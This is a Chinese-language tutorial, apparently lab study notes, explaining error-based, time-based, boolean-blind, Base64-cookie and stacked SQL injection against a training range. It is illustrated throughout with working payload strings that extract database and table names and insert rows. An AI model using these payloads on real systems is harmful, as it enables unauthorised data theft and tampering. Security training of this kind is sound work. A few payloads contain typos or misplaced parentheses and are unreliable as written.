目录
1.SQL注入之查询方式
1.1select 查询数据
1.2delete 删除数据
1.3insert 插入数据
1.4update 更新数据
2.SQL注入 报错盲注
2.1基于布尔的SQL盲注 - 逻辑判断
2.2基于时间的SQL盲注 - 延时判断
2.3基于报错的SQL盲注 - 报错回显(强制性报错 )
2.3.1updatexml():从目标XML中更改包含所查询值的字符串
2.3.2extractvalue():从目标XML中返回包含所查询值的字符串
3.基于时间的SQL盲注 - 延时注入
3.1基础命令
4.SQL注入之布尔盲注
4.1什么是布尔盲注
4.2如何进行布尔盲注
4.2.1判断有无注入点:
4.2.2判断数据类型:
4.2.3结合二分法进行盲猜:
4.3.靶场案例演示
4.3.1 猜解数据库的名字
4.3.2猜解表明名
4.4盲注分为三种:
5.SQL注入之加解密注入
6.SQL注入之堆叠注入
Less-38
1.SQL注入之查询方式
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显得原因可能时SQL语句查询方式问题导致,这个时候我们需要用到报错或者盲注进行后续操作,同时在注入的过程中,提前了解其中SQL语句可以更好的选择对应的注入语句。
1.1select 查询数据
select * from user where id=$id
1.2delete 删除数据
delete from user where id=$id
1.3insert 插入数据
inser into user (id,name,pass) values(1,'zhangsan','1234')
1.4update 更新数据
update user set pwd='p' where id=1
2.SQL注入 报错盲注
盲注就是在注入的过程中,获取的数据不能显示到前端页面,此时,我们需要利用一些方法进行判断或者尝试,我们称之为盲注。我们可以知道盲注分为以下三类:
2.1基于布尔的SQL盲注 - 逻辑判断
regexp like ascii left ord mid
2.2基于时间的SQL盲注 - 延时判断
if sleep
2.3基于报错的SQL盲注 - 报错回显(强制性报错 )
函数解析:
2.3.1updatexml():从目标XML中更改包含所查询值的字符串
第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC
第二个参数:XPath_string(Xpath格式字符串)
第三个参数:new_value,String格式,替换查找到的符合条件的数据
updatexml(XML_document,XPath_String,new_value);
uname=xy' union select 1, updatexml(1,concat(0x7e,database(),0x7e),0) %23&passwd=12345&submit=Submit
uname=xy' or updatexml(1,concat(0x7e,database()),0) or' %23&passwd=12345&submit=Submit
2.3.2extractvalue():从目标XML中返回包含所查询值的字符串
第一个参数:XML_document 是String格式,为XML文档对象的名称,文中为DOC
第二个参数:XPath_String (Xpath格式字符串)
extractvalue(XML_document,XPath_String)
查库
uname=xy' union select 1,extractvalue(1,concat(0x7e,(select database()),0x7e)) %23&passwd=12345&submit=Submit
uname=xy' or extractvalue(1,concat(0x7e,database())) or' %23&passwd=12345&submit=Submit
3.基于时间的SQL盲注 - 延时注入
3.1基础命令
sleep():Sleep 函数可以使计算机程序(进程,任务或线程)进入休眠
在不使用sleep下查询数据所需要的时间
在使用sleep可以使查询数据休眠指定时间
if(): i f 是 计算机编程语言一个关键字,分支结构的一种
if(a,b,c):可以理解在java程序中的三目运算符,a条件成立 执行b, 条件不成立,执行c
使用if与sleep结合使用:
?id=1%20and%20sleep(if(database()=%27test%27,5,0))--+
可以通过length()来判断数据库的长度
?id=1%20and%20sleep(if(length(database()=8),5,0))--+
mid(a,b,c): 从b开始,截取a字符串的c位
?id=1%20and%20sleep(if(mid(database(),1,1)=%27s%27,5,0))--+
substr(a,b,c): 从b开始,截取字符串a的c长度
left(database(),1),database() : left(a,b)从左侧截取a的前b位
length(database())=8 :判断长度
?id=1%20and%20sleep(if(length(database())=8,8,0))
ord=ascii ascii(x)=100:判断x的ascii值是否为100
select * from t1 where id=1 and if(ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=120,sleep(3),0);
select * from t1 where id=1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=116,sleep(2),0);
4.SQL注入之布尔盲注
4.1什么是布尔盲注
Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。
4.2如何进行布尔盲注
4.2.1判断有无注入点:
and 1=1;
or 1=1;
4.2.2判断数据类型:
' ' " "
123等;
4.2.3结合二分法进行盲猜:
length() > 数字
mid() substr() left ......
4.3.靶场案例演示
4.3.1 猜解数据库的名字
?id=1' and ascii(mid(database(),1,1))>115--+ 非正常
?id=1' and ascii(mid(database(),1,1))>116--+ 非正常
?id=1' and ascii(mid(database(),1,1))=115--+ 正常
?id=1' and ascii(mid(database(),2,1))=101--+ 正常
?id=1' and ascii(mid(database(),3,1))=99--+ 正常
如此就得到了
第一个字符的ASCII码为115解码出来为“s”
第二个字符的ASCII码为101解码出来为“e”
第二个字符的ASCII码为99解码出来为“c”
依次类推出数据库的名字为“security”
4.3.2猜解表明名
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+
正确
?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=101--+ 正确
注:select下的limit是第几个表。
substr下的是截取的表内容。
当前库下(注入点连接的数据库)第一个表ASCII码为114 解码为r
当前库下(注入点连接的数据库)第一个表ASCII码为101 解码为e
当前库下(注入点连接的数据库)第一个表ASCII码为.... 解码为referer
4.4盲注分为三种:
[布尔型盲注]: 根据页面返回的真假来判断的即为布尔型盲注
[时间型盲注]: 根据页面返回的时间来判断的即为时间型盲注
[报错型盲注]:根据页面返回的对错来判断的即为报错型盲注
5.SQL注入之加解密注入
Base64是网络上最常见的用于传输8Bit的编码方式之一,Base64就是一种基于64个可打印字符来表示数据的方法。
Less-21关 Cookie加密注入:
通过Burpsuite抓包:
进行Base64解密:
6.SQL注入之堆叠注入
在SQL中,分号 ;是用来表示一条sql语句的结束。
在; 结束一个sql语句后面继续构造下一个语句,也就是堆叠注入。
union injection(联合注入)也是将两条语句合并在一起
两者之间有什么区别?
区别就在于union执行语句类型有限,可以用来执行查询语句,
而堆叠注入可以执行的是任意语句
Less-38
?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2722%27,%27mc%27,%27hello%27)--+
